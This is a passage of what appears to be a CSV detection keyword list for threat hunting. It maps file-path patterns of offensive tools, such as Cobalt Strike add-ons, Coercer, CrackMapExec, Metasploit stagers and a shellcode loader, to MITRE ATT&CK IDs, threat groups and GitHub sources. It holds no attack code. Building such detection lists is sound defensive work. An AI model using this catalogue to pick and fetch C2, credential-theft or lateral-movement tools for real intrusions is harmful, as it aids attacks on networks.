T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/trustedsec/CS-Remote-OPs-BOF,1,1,N/A,10,10,599,98,2023-09-26T19:21:22Z,2022-04-25T16:32:08Z -*/clipboardinject/*,offensive_tool_keyword,cobaltstrike,Cobaltstrike Bofs,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/trustedsec/CS-Remote-OPs-BOF,1,1,N/A,10,10,599,98,2023-09-26T19:21:22Z,2022-04-25T16:32:08Z -*/clipmon/clipmon.sln*,offensive_tool_keyword,cobaltstrike,Cobaltstrike addons to interact with clipboard,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/DallasFR/Cobalt-Clip,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*/clipmon/dll/*,offensive_tool_keyword,cobaltstrike,Cobaltstrike addons to interact with clipboard,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/DallasFR/Cobalt-Clip,1,1,N/A,10,,N/A,,, -*/CloakNDaggerC2*,offensive_tool_keyword,CloakNDaggerC2,A C2 framework designed around the use of public/private RSA key pairs to sign and authenticate commands being executed. This prevents MiTM interception of calls and ensures opsec during delicate operations.,T1090 - T1090.003 - T1071 - T1071.001 - T1553 - T1553.002,TA0011 - TA0042 - TA0003,N/A,N/A,C2,https://github.com/matt-culbert/CloakNDaggerC2,1,1,N/A,10,10,4,2,2023-10-02T19:54:24Z,2023-04-28T01:58:18Z -*/clock-skew.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/cloud_enum.git*,offensive_tool_keyword,cloud_enum,Multi-cloud OSINT tool. Enumerate public resources in AWS Azure and Google Cloud.,T1596,TA0043,N/A,N/A,Reconnaissance,https://github.com/initstring/cloud_enum,1,1,N/A,6,10,1238,199,2023-07-31T07:27:37Z,2019-05-31T09:14:05Z -*/cloud_enum.py*,offensive_tool_keyword,cloud_enum,Multi-cloud OSINT tool. Enumerate public resources in AWS Azure and Google Cloud.,T1596,TA0043,N/A,N/A,Reconnaissance,https://github.com/initstring/cloud_enum,1,1,N/A,6,10,1238,199,2023-07-31T07:27:37Z,2019-05-31T09:14:05Z -*/cloud_enum.txt*,offensive_tool_keyword,cloud_enum,Multi-cloud OSINT tool. Enumerate public resources in AWS Azure and Google Cloud.,T1596,TA0043,N/A,N/A,Reconnaissance,https://github.com/initstring/cloud_enum,1,0,N/A,6,10,1238,199,2023-07-31T07:27:37Z,2019-05-31T09:14:05Z -*/cloudbrute.yaml*,offensive_tool_keyword,Osmedeus,Osmedeus - A Workflow Engine for Offensive Security,T1595,TA0043,N/A,N/A,Exploitation Tools,https://github.com/j3ssie/osmedeus,1,1,N/A,N/A,10,4712,845,2023-09-16T05:02:26Z,2018-11-10T04:17:18Z -*/cloudsploit.git*,offensive_tool_keyword,cloudsploit,CloudSploit by Aqua is an open-source project designed to allow detection of security risks in cloud infrastructure accounts including: Amazon Web Services (AWS) - Microsoft Azure - Google Cloud Platform (GCP) - Oracle Cloud Infrastructure (OCI) and GitHub. These scripts are designed to return a series of potential misconfigurations and security risks.,T1526 - T1534 - T1547 - T1078 - T1046,TA0002 - TA0003 - TA0008,N/A,N/A,Exploitation tools,https://github.com/aquasecurity/cloudsploit,1,1,N/A,N/A,10,2921,641,2023-09-29T16:35:48Z,2015-06-29T15:33:40Z -*/clown-newuser.c*,offensive_tool_keyword,linux-exploit-suggester,Linux privilege escalation auditing tool,T1078 - T1068 - T1055,TA0004 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/The-Z-Labs/linux-exploit-suggester,1,0,N/A,10,10,4725,1055,2023-08-18T17:29:23Z,2016-10-06T21:55:51Z -*/cmd/c2.go*,offensive_tool_keyword,godoh,godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.,T1071 - T1001 - T1008 - T1070 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/sensepost/godoh,1,1,N/A,10,10,701,122,2023-02-25T06:31:07Z,2018-10-23T07:24:04Z -*/cmd/hades/*,offensive_tool_keyword,hades,Go shellcode loader that combines multiple evasion techniques,T1055 - T1027 - T1218 - T1027.001 - T1036,TA0002 - TA0008,N/A,N/A,Exploitation tools,https://github.com/f1zm0/hades,1,1,N/A,N/A,3,290,44,2023-06-21T19:22:57Z,2022-10-11T08:16:24Z -*/cmd_executor/*.go*,offensive_tool_keyword,mythic,mythic C2 agent,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/freyja/,1,1,N/A,10,10,11,6,2023-06-30T16:35:47Z,2022-09-28T17:20:04Z -*/cmd_log.txt*,offensive_tool_keyword,pacu,The AWS exploitation framework designed for testing the security of Amazon Web Services environments.,T1136.003 - T1190 - T1078.004,TA0006 - TA0001,N/A,N/A,Framework,https://github.com/RhinoSecurityLabs/pacu,1,0,N/A,9,10,3687,624,2023-10-03T04:16:53Z,2018-06-13T21:58:59Z -*/cmd_stager*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/cmdstager/*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/cme smb *,offensive_tool_keyword,crackmapexec,crackmapexec command lines. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks,T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002,TA0002 - TA0006 - TA0007,N/A,APT39 - Dragonfly - FIN7 - MuddyWater,POST Exploitation tools,https://github.com/Porchetta-Industries/CrackMapExec,1,0,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -*/cme winrm *,offensive_tool_keyword,crackmapexec,crackmapexec command lines. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks,T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002,TA0002 - TA0006 - TA0007,N/A,APT39 - Dragonfly - FIN7 - MuddyWater,POST Exploitation tools,https://github.com/Porchetta-Industries/CrackMapExec,1,0,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -*/cme_adcs_output_*.txt*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*/cme_shares_output_*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*/cme_spooler_output_*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*/cmedb,offensive_tool_keyword,crackmapexec,windows default copiled executable name for crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral move,T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002,TA0002 - TA0006 - TA0007,N/A,APT39 - Dragonfly - FIN7 - MuddyWater,POST Exploitation tools,https://github.com/Porchetta-Industries/CrackMapExec,1,1,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -*/CMSeek*,offensive_tool_keyword,CMSeek,CMS Detection and Exploitation suite - Scan WordPress. Joomla. Drupal and 130 other CMSs.,T1553 - T1580 - T1583 - T1584 ,TA0007,N/A,N/A,Web Attacks,https://github.com/Tuhinshubhra/CMSeek,1,0,N/A,N/A,10,2062,497,2023-07-03T12:17:20Z,2018-06-14T00:15:51Z -*/Cn33liz*,offensive_tool_keyword,Github Username,Github username Red teamer @ Outflank. Passionate about networking and cybersecurity. known for exploitation tools dev,N/A,N/A,N/A,N/A,POST Exploitation tools,https://github.com/Cn33liz,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/cna/pipetest.cna*,offensive_tool_keyword,cobaltstrike,Example code for using named pipe output with beacon ReflectiveDLLs,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/rxwx/cs-rdll-ipc-example,1,1,N/A,10,10,101,24,2020-06-24T19:47:35Z,2020-06-24T19:43:56Z -*/Cneelis*,offensive_tool_keyword,Github Username,Github username Red teamer @ Outflank.Passionate about networking and cybersecurity. known for exploitation tools dev,N/A,N/A,N/A,N/A,POST Exploitation tools,https://twitter.com/Cneelis,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/co2-cewler/*,offensive_tool_keyword,burpsuite,CO2 is a project for lightweight and useful enhancements to Portswigger popular Burp Suite web penetration tool through the standard Extender API,T1583 - T1595 - T1190,TA0001 - TA0002 - TA0009,N/A,N/A,Network Exploitation tools,https://github.com/JGillam/burp-co2,1,1,N/A,N/A,2,142,40,2019-12-24T22:30:15Z,2015-04-19T03:38:34Z -*/co2-core/*,offensive_tool_keyword,burpsuite,CO2 is a project for lightweight and useful enhancements to Portswigger popular Burp Suite web penetration tool through the standard Extender API,T1583 - T1595 - T1190,TA0001 - TA0002 - TA0009,N/A,N/A,Network Exploitation tools,https://github.com/JGillam/burp-co2,1,1,N/A,N/A,2,142,40,2019-12-24T22:30:15Z,2015-04-19T03:38:34Z -*/co2-laudanum/*,offensive_tool_keyword,burpsuite,CO2 is a project for lightweight and useful enhancements to Portswigger popular Burp Suite web penetration tool through the standard Extender API,T1583 - T1595 - T1190,TA0001 - TA0002 - TA0009,N/A,N/A,Network Exploitation tools,https://github.com/JGillam/burp-co2,1,1,N/A,N/A,2,142,40,2019-12-24T22:30:15Z,2015-04-19T03:38:34Z -*/co2-sqlmapper/*,offensive_tool_keyword,burpsuite,CO2 is a project for lightweight and useful enhancements to Portswigger popular Burp Suite web penetration tool through the standard Extender API,T1583 - T1595 - T1190,TA0001 - TA0002 - TA0009,N/A,N/A,Network Exploitation tools,https://github.com/JGillam/burp-co2,1,1,N/A,N/A,2,142,40,2019-12-24T22:30:15Z,2015-04-19T03:38:34Z -*/coap-resources.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/cobaltclip.c*,offensive_tool_keyword,cobaltstrike,Cobaltstrike addons to interact with clipboard,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/DallasFR/Cobalt-Clip,1,1,N/A,10,,N/A,,, -*/cobaltclip.o*,offensive_tool_keyword,cobaltstrike,Cobaltstrike addons to interact with clipboard,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/DallasFR/Cobalt-Clip,1,1,N/A,10,,N/A,,, -*/Cobalt-Clip/*,offensive_tool_keyword,cobaltstrike,Cobaltstrike addons to interact with clipboard,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/DallasFR/Cobalt-Clip,1,1,N/A,10,,N/A,,, -*/cobaltstrike*,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*/cobalt-strike*,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*/cobaltstrike/c2lint*,offensive_tool_keyword,C2concealer,C2concealer is a command line tool that generates randomized C2 malleable profiles for use in Cobalt Strike.,T1090 - T1090.003 - T1027 - T1027.005 - T1071 - T1071.001,TA0042 - TA0005 - TA0011,N/A,N/A,C2,https://github.com/RedSiege/C2concealer,1,0,N/A,10,10,850,162,2021-09-26T16:37:06Z,2020-03-23T14:13:16Z -*/CodeBuildLooter.py*,offensive_tool_keyword,AWS-Loot,Searches an AWS environment looking for secrets. by enumerating environment variables and source code. This tool allows quick enumeration over large sets of AWS instances and services.,T1552,TA0002,N/A,N/A,Exploitation tools,https://github.com/sebastian-mora/AWS-Loot,1,1,N/A,N/A,1,64,14,2020-02-02T00:51:56Z,2020-02-02T00:25:46Z -*/coercer.egg-info*,offensive_tool_keyword,Coercer,A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.,T1110 - T1021 - T1020,TA0006 - TA0010,N/A,N/A,Exploitation tools,https://github.com/p0dalirius/Coercer,1,1,N/A,N/A,10,1359,152,2023-09-22T07:44:36Z,2022-06-30T16:52:33Z -*/Coercer.git*,offensive_tool_keyword,Coercer,A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.,T1110 - T1021 - T1020,TA0006 - TA0010,N/A,N/A,Exploitation tools,https://github.com/p0dalirius/Coercer,1,1,N/A,N/A,10,1359,152,2023-09-22T07:44:36Z,2022-06-30T16:52:33Z -*/Coercer.py*,offensive_tool_keyword,Coercer,A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.,T1110 - T1021 - T1020,TA0006 - TA0010,N/A,N/A,Exploitation tools,https://github.com/p0dalirius/Coercer,1,1,N/A,N/A,10,1359,152,2023-09-22T07:44:36Z,2022-06-30T16:52:33Z -*/Coercer/*.py,offensive_tool_keyword,Coercer,A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.,T1110 - T1021 - T1020,TA0006 - TA0010,N/A,N/A,Exploitation tools,https://github.com/p0dalirius/Coercer,1,1,N/A,N/A,10,1359,152,2023-09-22T07:44:36Z,2022-06-30T16:52:33Z -*/coercer_output_*.txt*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*/CoffeeLdr.c*,offensive_tool_keyword,cobaltstrike,Beacon Object File Loader,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 